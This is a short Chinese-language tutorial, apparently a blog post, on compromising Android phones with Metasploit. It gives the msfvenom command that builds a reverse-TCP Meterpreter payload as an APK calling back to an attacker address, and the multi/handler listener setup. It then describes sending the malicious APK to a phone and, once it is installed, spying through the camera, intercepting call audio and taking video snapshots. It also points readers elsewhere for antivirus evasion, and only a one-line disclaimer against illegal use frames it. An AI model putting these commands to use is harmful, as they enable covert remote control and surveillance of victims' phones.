METASPLOIT之安卓渗透之旅

libo

Metasploit之安卓渗透之旅
首先打开vm启动Kali linux。接着打开终端，使用msfvenom制作android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令，使用msfvenom工具来创建有效载荷APK文件。


[pre]msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 r>/root/123.apk [/pre]
-p 是Payload to use
Lhost 攻击者的ip，就是自己的ip
Lport 攻击者的端口，（有高端口可能不是很容易被杀的一说，本人没证实）
r>/root/123.apk 文件生成的路径及文件名
然后就是搭建自己的客户端。


[pre]
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set LPORT 4444
Exploit
[/pre]

是时候将恶意的APK发送到手机上。
下载>安装：

至于如何绕过免杀，请在公众号中查看详细教程。
然后我们打开后，查看MSF:

然后我们就可以为所欲为~比如看摄像头啊，截取通话语音啊，视频快照啊，当然我们是不用做违法用途的。